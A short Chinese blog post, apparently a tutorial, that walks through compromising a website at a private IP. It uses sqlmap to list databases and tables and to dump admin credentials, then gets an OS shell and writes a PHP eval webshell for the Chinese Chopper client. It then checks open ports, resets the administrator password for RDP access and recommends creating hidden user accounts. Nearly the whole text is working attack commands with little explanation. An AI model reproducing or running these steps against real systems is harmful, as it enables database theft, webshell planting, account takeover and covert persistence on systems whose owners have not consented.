深夜的我,乏困中有一丝希望,这是我的未来,且走且珍惜。
——杰
这里的192.168.20.71,现在已经无效。
假设,觉得一个网站存在数据库注入漏洞,则渗透如下,比有结果。
python sqlmap.py -u http://192.168.20.71/news.php?newsid=24Sql注入查看都有那些数据库。
有东西,则:
python Sqlmap.py -u http://192.168.20.71/news.php?newsid=24 -D 510cms --tables查询510cms数据库都有那些表。
python Sqlmap.py -u http://192.168.20.71/news.php?newsid=24 -D "510cms" -T "510_admin" -C "name,passwd" --dump查询敏感信息。
假设我们已经登录后台,得到目录或者绝对路径
则进一步可以:
python Sqlmap.py -u http://192.168.20.71/news.php?newsid=24 --os-shell进入shell的界面,给系统内部写入一句话木马。
echo^<?php @eval($_POST[c]);?^>>C:/WWW/1.php然后菜刀上场,连接他。
这里可以检查文件管理、数据库还有终端。
我这里侧重讲一下终端。
netstat -an这里是查询那些开启的端口。端口不一样,我们可以做的事情也不一样。
假设这里开启了3389端口。则我们可以远程登陆
whoami查看当前权限。
net user administrator Simplexue123修改用户密码,然后就可以了
也可以自己创建新用户。建议用隐形用户。
有问题请留言,我们一起学习
180
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
